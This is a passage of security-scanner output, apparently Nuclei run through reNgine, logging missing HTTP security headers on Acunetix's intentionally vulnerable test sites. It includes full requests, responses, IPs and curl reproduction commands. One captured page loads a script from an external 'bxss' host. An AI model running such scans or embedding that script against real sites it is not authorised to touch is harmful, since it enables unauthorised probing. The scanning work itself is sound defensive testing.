id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.630181849Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:53.630233822Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.95630995Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:54.671938364Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:54.672008087Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv 